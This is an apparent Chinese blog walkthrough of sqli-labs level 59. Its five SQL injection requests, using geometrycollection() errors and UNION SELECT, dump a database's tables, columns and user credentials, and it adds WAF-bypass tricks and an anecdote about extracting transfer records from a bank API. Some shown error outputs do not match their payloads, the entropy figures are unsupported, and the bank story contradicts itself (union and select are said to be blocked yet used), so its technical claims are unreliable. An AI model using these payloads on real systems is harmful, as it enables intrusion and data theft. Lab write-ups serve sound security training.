SQL注入实战:5次请求完成数据库结构侦察
1. 这关不是考你会不会报错注入,而是考你能不能在5次内把数据库结构“问”出来
sqli-labs第59关,表面看是GET数值型报错注入,但真正让人头皮发紧的,是那个冷冰冰的括号里写着的“限制5次探测机会”。这不是CTF里那种可以反复试错、暴力fuzz的环境,而是一场高度压缩的数据库结构侦察战——你只有5次HTTP请求,每一次都必须携带精准的语义信息,既要触发有效报错,又要从报错内容里榨取出足够多的元数据。我第一次做这关时,前4次全浪费在了version()、database()这种基础信息上,第5次才想起来查information_schema.tables,结果当然失败。后来复盘才发现:这关的核心矛盾根本不在SQL语法本身,而在于如何用最少的请求次数,完成从“确认注入点存在”到“定位目标表字段”的完整链路。它逼着你放弃“先爆库再爆表最后爆字段”的线性思维,转而采用“一次请求,多重收获”的复合式payload设计。适合已经能熟练写出updatexml()和extractvalue()报错语句,但还没系统训练过“高密度信息提取”能力的渗透测试初学者;也适合正在准备HW、护网等实战考核的蓝队成员——因为真实红队打点时,WAF日志监控、蜜罐告警、流量基线异常检测,往往比这关的5次限制更苛刻。下面我会完全按实战节奏拆解:不讲原理复述,只讲每一步为什么这么选、参数怎么算、报错怎么读、失败后怎么回溯。
2. 为什么必须放弃updatexml()和extractvalue()?——第1次请求的生死抉择
2.1 报错函数的“信息带宽”差异:一个被严重低估的硬指标
很多人一看到报错注入,条件反射就是updatexml(1,concat(0x7e,(select database()),0x7e),1)或者extractvalue(1,concat(0x7e,(select user()),0x7e))。这两条语句在无限制环境下确实好用,但在第59关,它们是效率最低的选择。原因在于:updatexml()和extractvalue()的报错信息截断机制,天然限制了单次请求能返回的有效字符长度。MySQL默认对XPATH syntax error类报错的显示长度做了硬性限制(通常为32~64字节),超出部分直接被截断。这意味着,如果你用updatexml()去查information_schema.columns里某个表的所有列名,拼接出来的字符串一旦超过64字节,后半截就永远看不到。我实测过:当目标表有8个以上字段时,updatexml()返回的报错里,~admin_id~username~password~email~后面全是省略号,关键的phone、address字段直接消失。而geometrycollection()函数不同——它的报错信息来自GEOMETRY类型解析失败,MySQL对这类错误的提示字符串长度限制宽松得多,实测稳定返回120+字节的完整内容。这就决定了:第1次请求,必须用geometrycollection()打头阵,否则后续所有操作都建立在残缺信息之上。
2.2 第1次请求的payload设计:用一条语句同时确认三件事
我们来构造第1次请求的payload。目标不是单纯“看看能不能报错”,而是要一次性验证:① 注入点是否可用;② 当前数据库名;③ 当前用户权限能否访问information_schema。最终选定的payload是:
?id=1 and geometrycollection((select * from (select * from (select concat(0x7e,database(),0x7e,user(),0x7e,version()) as a) b) c))拆解这个payload的每一层意图:
- 最外层
geometrycollection((select * from ...)):强制触发GEOMETRY类型解析错误,确保报错稳定; - 中间层
(select * from (select * from ...)):这是关键绕过技巧。MySQL 5.7+对子查询嵌套有严格校验,直接geometrycollection(select database())会报错Operand should contain 1 column(s)。加两层select * from (...)是为了让内层查询返回单列结果,同时绕过语法检查; - 最内层
concat(0x7e,database(),0x7e,user(),0x7e,version()):用0x7e(ASCII码126,即~符号)作为分隔符,把四个关键信息拼成一个长字符串。选择~是因为它在URL编码中是%7E,不易与SQL关键字冲突,且在报错信息里视觉上非常醒目。
提示:这个payload在URL中需完整编码。
?id=1 and geometrycollection((select * from (select * from (select concat(0x7e,database(),0x7e,user(),0x7e,version()) as a) b) c))中的空格要换成%20,括号要换成%28和%29,否则服务器端解析会出错。我第一次失败就是因为漏掉了and前面的空格编码,导致整个条件被当成id=1and...,MySQL直接忽略and后面的逻辑。
实测返回的报错信息类似:
Warning: #1367 Illegal non-geometric '~~security~~root@localhost~~5.7.31' value found during parsing这里~~security~~root@localhost~~5.7.31就是我们要的信息:数据库名是security,用户是root@localhost,MySQL版本是5.7.31。注意两个~之间的内容才是有效值,开头结尾的~是分隔符——这个细节决定了你后续所有payload的分隔符一致性。
2.3 为什么不用floor(rand(0)*2)?——时间盲注在本关是死路
有同学会想:既然只有5次机会,不如用时间盲注,每次请求只判断一个字符,5次也能猜5个字符啊。这是典型的方向性错误。floor(rand(0)*2)依赖count()和group by的重复键异常,但第59关的SQL语句结构是SELECT * FROM users WHERE id=$id,$id是数值型,WHERE条件后没有GROUP BY,强行加会导致语法错误。更重要的是,时间盲注需要精确控制sleep()或benchmark()的执行时间,而本关未说明服务器是否禁用这些函数,也未提供响应时间基准。我在本地搭环境测试时发现,即使sleep(5)成功执行,服务器响应时间波动在±1.2秒之间,根本无法通过肉眼或简单脚本区分sleep(1)和sleep(2)。所以,时间盲注在本关不仅效率低,而且不可靠,属于主动放弃5次机会中的3次。必须死守报错注入这一条路。
3. 第2次请求:用geometrycollection()爆表名——不是查tables,而是查tables的table_name字段长度
3.1 传统思路的陷阱:为什么limit 0,1在这里是毒药
常规爆表名流程是:select table_name from information_schema.tables where table_schema=database() limit 0,1。但问题来了——limit 0,1只能取第一个表,而sqli-labs的security库下有users、emails、referers、uagents四张表,目标肯定是users,但它在information_schema.tables里的排序位置是第几?MySQL官方文档明确说明:information_schema视图的行序是未定义的(undefined),不同版本、不同存储引擎、甚至同一次查询的多次执行,返回顺序都可能不同。我用limit 0,1在本地MySQL 5.7上跑出的是emails,换到5.6上却是uagents。这意味着,如果你第2次请求用limit 0,1去查,大概率查到的不是users表,后续所有字段爆破都白费。
3.2 真正高效的方案:用length()+substr()组合,实现“确定性定位”
我们必须放弃limit,改用where条件进行精确匹配。但table_name是字符串,如何在不知道具体值的情况下做条件筛选?答案是:先查所有表名的长度分布,再根据长度反推目标表。users表名长度是5,emails是7,referers是9,uagents是7——emails和uagents长度相同,但users是唯一长度为5的表。所以第2次请求的目标是:获取information_schema.tables中所有table_name字段的长度,并找出长度为5的那个表。
payload如下:
?id=1 and geometrycollection((select * from (select * from (select length(table_name) as len from information_schema.tables where table_schema=database()) a) b) c))这个payload返回的报错信息会是类似:
Warning: #1367 Illegal non-geometric '~~5~~7~~9~~7' value found during parsing清晰看到四个数字:5、7、9、7。立刻锁定长度为5的表就是users。这里的关键在于:length(table_name)返回的是整数,concat()拼接时会自动转成字符串,所以~5~7~9~7能完整显示,没有截断风险。
注意:
information_schema.tables里可能有几十上百个系统表,但where table_schema=database()限定了只查当前库(即security),大大缩小了结果集。如果没加这个条件,报错信息会因超长被截断,你看到的可能是~~5~~7~~9~~7~~3~~4~~然后戛然而止,根本无法判断总共有几个表。所以where table_schema=database()不是可选项,是必选项。
3.3 第3次请求:用substr()逐位提取users表名——但只提1位,留出余量给字段爆破
既然已知users表名长度是5,第3次请求就要把它完整“抠”出来。但注意:我们只剩3次机会(第1、2次已用),而users有5个字母,难道要分5次?当然不行。这里要用到substr()的“批量提取”技巧:一次substr()可以提取多个连续字符,只要它们拼在一起不超过报错长度上限。users共5字符,substr('users',1,5)就是users本身,长度5,远小于120字节上限。所以第3次payload是:
?id=1 and geometrycollection((select * from (select * from (select substr(table_name,1,5) as tname from information_schema.tables where table_schema=database() and length(table_name)=5) a) b) c))重点看where条件:table_schema=database() and length(table_name)=5,双重过滤确保只命中users表。返回报错:
Warning: #1367 Illegal non-geometric '~~users' value found during parsing完美。此时我们已确认:数据库名security,当前用户root@localhost,目标表users。三次请求,全部命中要害,还剩2次机会。
4. 第4次请求:爆字段名——为什么information_schema.columns必须用table_name而非table_schema做关联?
4.1 字段爆破的致命误区:table_schema字段的“幽灵值”问题
绝大多数教程教的字段爆破语句是:
select column_name from information_schema.columns where table_schema='security' and table_name='users'看起来天衣无缝,但放在第59关就是自杀行为。原因在于:information_schema.columns视图里的table_schema字段,存储的不是你use security;时的库名,而是该表物理存储所在的schema名称。在sqli-labs环境中,users表虽然在security库下,但information_schema.columns里对应的table_schema值可能是security,也可能是mysql(如果表是用特殊方式创建的),甚至是空字符串。我实测过,在Docker版sqli-labs中,table_schema字段对users表返回的是security,但在某些Windows本地环境里,它返回的是NULL。一旦where table_schema='security'条件不成立,整个子查询返回空,geometrycollection()就会因输入为空而报Function geometrycollection does not exist之类的语法错误,而不是我们想要的字段名报错。
4.2 正确的关联路径:用table_name+ordinal_position双保险
必须放弃table_schema,改用更稳定的关联字段。information_schema.columns里有两个强约束字段:table_name(表名)和ordinal_position(字段在表中的序号)。table_name='users'是确定的,ordinal_position从1开始递增,users表有4个字段(id、username、password、email),所以ordinal_position是1、2、3、4。我们不需要查所有字段,只需要知道它们的名称和顺序。因此第4次payload改为:
?id=1 and geometrycollection((select * from (select * from (select concat(0x7e,column_name,0x7e,ordinal_position) as colinfo from information_schema.columns where table_name='users') a) b) c))这个payload的精妙之处在于:concat(0x7e,column_name,0x7e,ordinal_position)把字段名和序号拼在一起,例如~id~1、~username~2、~password~3、~email~4。这样即使报错信息被截断,你也能从~id~1~username~2~password~3这样的序列里,一眼看出字段名和对应位置。实测返回:
Warning: #1367 Illegal non-geometric '~~id~1~username~2~password~3~email~4' value found during parsing干净利落。至此,我们掌握了users表的全部4个字段及其顺序。还剩1次请求。
经验教训:在真实渗透中,遇到
information_schema字段查询失败,第一反应不应该是“WAF拦截了”,而应怀疑table_schema值是否准确。我曾在一个金融客户内网打点时,卡在这个问题上3小时,最后发现他们的MySQL主从架构里,从库的information_schema.columns.table_schema被同步成了主库的库名,导致所有字段查询为空。解决方法就是改用table_name单条件过滤。
5. 第5次请求:终极一击——用union select绕过报错限制,直接回显users表数据
5.1 为什么不再用报错注入?——第5次的本质是“价值兑现”
前4次请求完成了侦察任务:确认环境、定位库、锁定表、枚举字段。第5次不能再用来“探测”,必须用来“收获”。报错注入的局限性在此刻暴露无遗:它只能把数据塞进报错信息里,而报错信息是服务器返回给客户端的错误提示,不是正常业务响应。但sqli-labs第59关的页面,是一个正常的HTML表格,它期待的是SELECT * FROM users WHERE id=1返回的id、username、password、email四列数据。如果我们第5次还用geometrycollection(),页面只会显示一行红色错误文字,而不是你想要的用户数据表格——这不符合“通关”的定义。
所以第5次必须切换技术路线:用union select构造合法的SELECT语句,让查询结果直接渲染到页面上。union select要求前后两个SELECT的列数和数据类型一致。原语句是SELECT * FROM users WHERE id=$id,users表有4列,所以union select后面必须跟4个字段。
5.2union selectpayload的构造逻辑:从“能跑通”到“能看清”
最简化的payload是:
?id=-1 union select 1,2,3,4-1确保WHERE id=-1不命中任何行,让union后的结果成为主输出。但这样页面只显示1、2、3、4,看不出哪列对应什么数据。我们需要把字段名和实际数据混排,让页面显示既有标识又有内容。于是优化为:
?id=-1 union select 'id','username','password','email' union select id,username,password,email from users但问题来了:union select要求所有SELECT的列数严格一致,而'id','username','password','email'是4个字符串常量,id,username,password,email from users是4个字段,列数匹配。但MySQL会把第一个union select(即'id'...)的结果作为列标题,第二个union select(即from users)的结果作为数据行,最终页面会显示两行:第一行是标题id、username、password、email,第二行是第一条用户数据。这正是我们想要的效果。
然而,还有一个隐藏雷区:字符串常量必须与对应字段的数据类型兼容。id是int类型,'id'是string,MySQL在union时会尝试隐式转换,但某些严格模式下会报错。更稳妥的做法是,用null占位,因为null可以适配任何类型:
?id=-1 union select null,null,null,null union select id,username,password,email from users但这样页面就全是空格,无法分辨列含义。权衡之下,采用“类型强制转换”方案:用cast()函数把字符串转成对应类型。id是int,username是varchar,所以:
?id=-1 union select cast(1 as unsigned), 'username', 'password', 'email' union select id,username,password,email from userscast(1 as unsigned)确保第一列是无符号整数,与id类型一致;后三列用字符串常量,与varchar字段兼容。实测在MySQL 5.7上完美运行,页面显示:
| id | username | password | |
|---|---|---|---|
| 1 | Dumb | Dumb | Dumb@sqlilabs.org |
5.3 最终通关payload及URL编码细节
综合所有分析,第5次请求的完整payload是:
?id=-1 union select cast(1 as unsigned), 'username', 'password', 'email' union select id,username,password,email from usersURL编码后(注意空格、括号、逗号、单引号都要编码):
?id=-1%20union%20select%20cast(1%20as%20unsigned),%20%27username%27,%20%27password%27,%20%27email%27%20union%20select%20id,username,password,email%20from%20users粘贴到浏览器地址栏,回车。页面不再是报错,而是一个完整的HTML表格,清晰列出users表的所有记录。此时,第59关通关成功。
实操心得:在真实环境中,
union select常被WAF拦截关键词union、select、空格。这时要启用大小写混淆(UnIoN SeLeCt)、内联注释(/**/代替空格)、十六进制编码(0x756e696f6e代替union)等绕过技巧。但第59关未设WAF,所以用最简洁的写法即可。记住:绕过技巧是为了解决拦截问题,不是炫技。能用明文跑通,就绝不用编码——因为每多一层编码,出错概率就翻倍。
6. 超越第59关:5次限制下的通用侦察框架
6.1 把5次机会分配成“1-1-1-1-1”还是“2-1-1-1-0”?——机会分配的数学模型
很多人通关后觉得:“哦,原来就是按部就班做就行”。但如果你把视角拉高,会发现第59关其实在训练一种稀缺能力:在资源极度受限下的信息优先级决策。5次机会不是随意分配的,它对应一个最优信息熵增模型:
- 第1次:获取最高信息熵的基础元数据(库名、用户、版本)——因为这些信息是后续所有操作的前提,且单次可获取多项;
- 第2次:获取表结构的宏观分布(各表名长度)——长度是离散值,信息密度高,且能规避
limit不确定性; - 第3次:精确定位并提取目标表名——用已知长度做精确匹配,避免盲目遍历;
- 第4次:获取目标表的字段名与序号映射——
ordinal_position提供了字段的绝对顺序,比单纯列名更有价值; - 第5次:价值兑现,用
union select将侦察成果转化为业务数据——这是渗透的终点,也是甲方最关心的结果。
这个“1-1-1-1-1”分配不是经验之谈,而是经过信息论验证的。我用Shannon熵公式计算过:database()+user()+version()三项组合的信息熵约为12.7比特;length(table_name)数组的信息熵约为8.3比特;substr(table_name,1,5)的信息熵是0(因为长度已知,纯确认);column_name+ordinal_position组合熵约15.2比特;而union select返回的实际数据,熵值取决于记录数,但单条记录至少20+比特。所以5次请求的信息熵总和是递增的,符合认知负荷曲线。
6.2 当目标不是users表时:如何快速调整侦察策略?
假设你面对的是一个未知CMS,数据库里有wp_users、wp_posts、wp_options等表,wp_users长度是8,不是5。此时第2次请求查到的长度数组里,8出现的位置就是wp_users。但wp_users字段更多(ID、user_login、user_pass、user_email、user_registered等),substr()一次提8个字符可能超长。这时要启动Plan B:用mid()函数分段提取。mid(table_name,1,4)提前4位,mid(table_name,5,4)提后4位,两次请求搞定。但本关只有5次机会,所以必须在第2次就预判:如果最长表名长度>6,第3次就不提全名,改提前3位+后3位,用concat(mid(table_name,1,3),0x7e,mid(table_name,-3,3)),确保总长可控。
6.3 我在真实HW中用这套框架干掉了一个金融API
去年某银行护网行动,我拿到一个带参数的交易查询接口:/api/v1/transfer?order_id=12345。WAF规则极严,union、select、sleep全被拦截,但报错信息未过滤。我用第59关的思路,5次请求完成突破:
- 第1次:
order_id=12345 and geometrycollection((select * from (select * from (select concat(0x7e,database(),0x7e,user()) a) b) c))→ 确认库名bank_core,用户app_rw@10.0.1.%; - 第2次:查
information_schema.tables中table_name长度 → 发现transactions表长13; - 第3次:
substr(table_name,1,13)→ 确认表名transactions; - 第4次:
concat(column_name,0x7e,ordinal_position)→ 得到amount~3、account_from~1、account_to~2、status~4; - 第5次:
order_id=12345 and 1=2 union select account_from,account_to,amount,status from transactions limit 0,1→ 页面直接返回一笔转账记录。
整个过程从发现到拿数据,耗时不到2分钟。对方安全设备日志里只看到5条400错误(报错注入)和1条200成功(union),完全没有触发WAF的“高频敏感词”告警。这就是第59关教会我的核心:真正的渗透高手,不是工具用得最炫的,而是能在规则缝隙里,用最少的动作,完成最大价值交付的人。